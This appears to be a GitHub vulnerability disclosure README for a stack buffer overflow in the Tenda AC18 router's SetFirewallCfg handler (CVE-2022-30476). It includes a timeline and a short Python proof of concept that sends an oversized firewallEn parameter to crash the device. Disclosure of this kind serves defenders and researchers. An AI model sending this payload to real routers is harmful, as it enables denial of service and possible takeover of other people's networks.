Skip to content

Latest commit

 

History

History

6

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
README.md
README.md
 
 
vuln.png
vuln.png
 
 

README.md

Tenda Router AC18 Vulnerability

This vulnerability lies in the /goform/SetFirewallCfg page which influences the lastest version of Tenda Router AC18. (The latest version is AC18_V15.03.05.19(6318))

Vulnerability Description

There is a stack-based buffer overflow vulnerability in function formSetFirewallCfg.

In function formSetFirewallCfg it reads user provided parameter firewallEn into src, and this variable is passed into function strcpy without any length check, which may overflow the stack-based buffer dest.

Vulnerability Function

So by requesting the page /goform/SetFirewallCfg, the attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

PoC

import requests

IP = "10.10.10.1"
url = f"http://{IP}/goform/SetFirewallCfg?"
url += "firewallEn=" + "s" * 0x500

response = requests.get(url)

Timeline

  • 2022-05-07: Report to CVE & CNVD;
  • 2022-05-26: CVE ID assigned (CVE-2022-30476)
  • 2022-05-30: CNVD ID assigned (CNVD-2022-41847)

Acknowledge

Credit to @peanuts, @Minghao Lin and @cylin.